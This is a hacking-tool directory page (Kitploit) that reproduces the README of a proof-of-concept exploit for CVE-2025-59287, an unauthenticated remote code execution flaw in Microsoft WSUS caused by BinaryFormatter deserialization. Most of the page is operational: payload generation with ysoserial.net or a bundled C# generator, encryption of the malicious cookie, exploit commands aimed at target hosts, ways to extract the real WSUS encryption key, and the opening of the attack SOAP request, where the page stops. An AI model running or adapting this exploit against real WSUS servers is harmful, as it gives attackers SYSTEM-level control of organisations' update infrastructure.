Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

FeedsContactPrivacy© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
cve-2025-59287-exploit-poc — Proof-of-concept exploit for CVE-2025-59287, a critical unauthenticated RCE in WSUS via unsafe BinaryFormatter deserialization, achieving SYSTEM privileges through crafted encrypted cookies. | Kitploit
Tools/GitHubGitHub/maxymgorn/cve-2025-59287-exploit-poc
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed TeamingPayload Development
GitHubmaxymgorn/cve-2025-59287-exploit-poc

cve-2025-59287-exploit-poc

Proof-of-concept exploit for CVE-2025-59287, a critical unauthenticated RCE in WSUS via unsafe BinaryFormatter deserialization, achieving SYSTEM privileges through crafted encrypted cookies.

View Repository
11511 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2025-59287 Proof-of-Concept Exploit

Vulnerability Overview

CVE-2025-59287 is a critical Remote Code Execution (RCE) vulnerability in Microsoft Windows Server Update Services (WSUS). The vulnerability is caused by unsafe deserialization of AuthorizationCookie data through BinaryFormatter in the EncryptionHelper.DecryptData() method.

Impact: Unauthenticated attackers can achieve remote code execution with SYSTEM privileges by sending malicious encrypted cookies to the GetCookie() endpoint.

CVSS Score: Critical (9.8)

Vulnerability Details

  • Affected Component: WSUS ClientWebService.asmx GetCookie() endpoint
  • Root Cause: BinaryFormatter.Deserialize() called on untrusted input without proper validation
  • Attack Vector: Malicious encrypted cookie sent to GetCookie() SOAP endpoint
  • Authentication Required: No (unauthenticated RCE)
  • Affected Ports: 8530 (HTTP), 8531 (HTTPS)

Architecture

┌─────────────────┐
│   Attacker      │
│                 │
│  1. Generate    │
│     BinaryFmt   │
│     Payload     │
│                 │
│  2. Encrypt     │
│     Payload     │
│                 │
│  3. Send SOAP   │
│     Request     │
└────────┬────────┘
         │
         ▼
┌─────────────────┐
│   WSUS Server   │
│                 │
│  GetCookie()    │
│  Endpoint       │
│                 │
│  DecryptData()  │◄─── Vulnerable
│                 │
│  BinaryFormatter│◄─── Unsafe Deserialization
│  Deserialize()  │
│                 │
│  Execute        │◄─── RCE as SYSTEM
│  Payload        │
└─────────────────┘

Files Structure

exploit-poc/
├── wsus_exploit.py                    # Main exploit script
├── BinaryFormatterPayloadGenerator.cs # .NET payload generator (C#)
├── encrypt_payload.py                 # WSUS encryption helper
├── requirements.txt                   # Python dependencies
└── README.md                          # This file

Prerequisites

Python Environment

pip install -r requirements.txt

.NET Framework (for payload generation)

  • Windows with .NET Framework 4.0 or later
  • Or use ysoserial.net as alternative

Usage

Method 1: Complete Workflow

Step 1: Generate BinaryFormatter Payload

Option A: Using provided C# generator

# Compile the generator
csc /reference:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\WindowsBase.dll" BinaryFormatterPayloadGenerator.cs

# Generate payload
BinaryFormatterPayloadGenerator.exe calc.exe
# Creates: payload_YYYYMMDDHHMMSS.bin

Option B: Using ysoserial.net (Recommended)

ysoserial.exe -g ObjectDataProvider -f BinaryFormatter -c "calc.exe" -o raw > payload.bin

Step 2: Encrypt the Payload

python encrypt_payload.py payload.bin -o encrypted_cookie.txt

IMPORTANT: The encryption key in encrypt_payload.py is a placeholder. For real exploitation, you must:

  1. Reverse engineer the actual encryption key from WSUS binaries
  2. Update encrypt_payload.py with the real key
  3. See "Finding WSUS Encryption Key" section below

Step 3: Execute the Exploit

# Using payload file (will encrypt on-the-fly)
python wsus_exploit.py -t 192.168.1.100 -f payload.bin

# Using pre-encrypted cookie
python wsus_exploit.py -t 192.168.1.100 -e "$(cat encrypted_cookie.txt)"

# With HTTPS (port 8531)
python wsus_exploit.py -t wsus.example.com -p 8531 -f payload.bin

Method 2: Quick Test

# Generate, encrypt, and exploit in one go
BinaryFormatterPayloadGenerator.exe calc.exe
python wsus_exploit.py -t <TARGET_IP> -f payload_*.bin

Finding the Actual WSUS Encryption Key

The encryption key must be extracted from WSUS binaries for real exploitation.

Method 1: Reverse Engineering with dnSpy

  1. Locate WSUS DLLs:

    %ProgramFiles%\Update Services\WebServices\bin\
    

    Or IIS web directory:

    %SystemDrive%\inetpub\wwwroot\wsusadmin\
    
  2. Open in dnSpy (free .NET decompiler):

    • Download: https://github.com/dnSpy/dnSpy
    • Open Microsoft.UpdateServices.WebServices.dll
  3. Search for EncryptionHelper:

    • Navigate to: Microsoft.UpdateServices.WebServices namespace
    • Find EncryptionHelper class
    • Look at DecryptData() and EncryptData() methods
    • Extract the encryption key and algorithm
  4. Common patterns:

    • Hardcoded byte arrays
    • String constants
    • Key derivation from machine GUID/SID

Method 2: Runtime Analysis

  1. Use WinDbg or x64dbg:

    • Set breakpoint on EncryptionHelper.DecryptData()
    • Inspect memory/registers for key material
    • Monitor encryption/decryption operations
  2. Use Process Monitor:

    • Filter by WSUS process
    • Look for registry/config file access
    • Keys might be stored in registry

Method 3: Static Analysis

  1. Use IDA Pro or Ghidra:

    • Load WSUS binaries
    • Search for encryption-related strings
    • Analyze key derivation algorithms
  2. Use strings utility:

    strings Microsoft.UpdateServices.WebServices.dll | grep -i key
    strings Microsoft.UpdateServices.WebServices.dll | grep -i encrypt
    

Updating the Exploit

Once you have the actual key, update encrypt_payload.py:

# Replace this line in encrypt_wsus_cookie():
key_material = b"WSUS_Cookie_Encryption_Key_v1.0"  # PLACEHOLDER

# With the actual key:
key_material = b"ACTUAL_KEY_FROM_WSUS_BINARIES"

Or pass it via command line:

python encrypt_payload.py payload.bin -k "ACTUAL_KEY"

Exploit Flow

┌─────────────────────────────────────────────────────────────┐
│ 1. Generate BinaryFormatter Payload                         │
│    ObjectDataProvider → Process.Start() → Command Execution │
└───────────────────────┬─────────────────────────────────────┘
                        ▼
┌─────────────────────────────────────────────────────────────┐
│ 2. Encrypt Payload                                           │
│    AES-128-CBC with WSUS encryption key                      │
│    Base64 encode for transmission                            │
└───────────────────────┬─────────────────────────────────────┘
                        ▼
┌─────────────────────────────────────────────────────────────┐
│ 3. Create SOAP Request                                       │
│    AuthorizationCookie header contains encrypted payload      │
│    GetCookie() method in SOAP body                           │
└───────────────────────┬─────────────────────────────────────┘
                        ▼
┌─────────────────────────────────────────────────────────────┐
│ 4. Send to WSUS Endpoint                                     │
│    POST /ClientWebService/ClientWebService.asmx              │
│    Port 8530 (HTTP) or 8531 (HTTPS)                          │
└───────────────────────┬─────────────────────────────────────┘
                        ▼
┌─────────────────────────────────────────────────────────────┐
│ 5. WSUS Processing                                           │
│    DecryptData() decrypts cookie                             │
│    BinaryFormatter.Deserialize() executes payload            │
│    → RCE as SYSTEM                                           │
└─────────────────────────────────────────────────────────────┘

SOAP Request Structure

POST /ClientWebService/ClientWebService.asmx HTTP/1.1
Host: <TARGET>:8530
Content-Type: text/xml; charset=utf-8
SOAPAction: http://www.microsoft.com/SoftwareDistribution/Server/ClientWebService/GetCookie
User-Agent: WSUS Client

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
    <soap:Header>
Download Tool